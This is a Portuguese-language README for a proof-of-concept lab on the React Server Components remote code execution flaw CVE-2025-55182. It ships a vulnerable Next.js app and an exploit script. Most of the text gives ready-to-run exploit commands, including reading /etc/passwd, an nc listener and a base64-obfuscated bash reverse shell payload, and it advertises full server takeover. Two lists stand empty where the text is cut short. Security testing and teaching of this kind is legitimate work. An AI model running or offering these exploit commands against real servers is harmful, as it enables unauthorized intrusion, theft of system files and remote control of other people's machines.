CVE-2025-55182 React2Shell laboratório de PoC
Um laboratório abrangente para demonstrar e testar a vulnerabilidade crítica CVE-2025-55182 em React Server Components.
Este repositório destina-se a:
Não use contra sistemas que você não possui ou sem permissão explícita para testar. Acesso não autorizado é ilegal.
✅ Executar comandos arbitrários sem autenticação
✅ Ler arquivos do sistema
✅ Criar e modificar arquivos
✅ Estabelecer conexões reverse shell
✅ Obter controle total do servidor
npm install --legacy-peer-deps
npm run dev
O servidor iniciará em http://localhost:3000
bash check-cve.sh
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"
# Terminal 1 - Listener
nc -lvnp 4444
# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"
├── app/ # Vulnerable Next.js application
├── exploit/ # Working PoC exploit
│ └── rce_final.py # Main exploit script
├── check-cve.sh # Automated vulnerability checker
├── package.json # Vulnerable dependencies
└── README.md
A vulnerabilidade existe na lógica de desserialização de payloads do React Server Components. O exploit utiliza poluição de protótipo (prototype pollution) para executar código arbitrário via process.mainModule.require('child_process').execSync().
Este código é fornecido apenas para fins educacionais e de testes de segurança autorizados. Os usuários são responsáveis por garantir que possuem autorização adequada antes de testar qualquer sistema. O acesso não autorizado a sistemas de computador é ilegal sob leis como o Computer Fraud and Abuse Act (CFAA) e legislação semelhante em outras jurisdições.
O autor não assume nenhuma responsabilidade pelo uso indevido destas informações.
Após concluir este laboratório, você entenderá: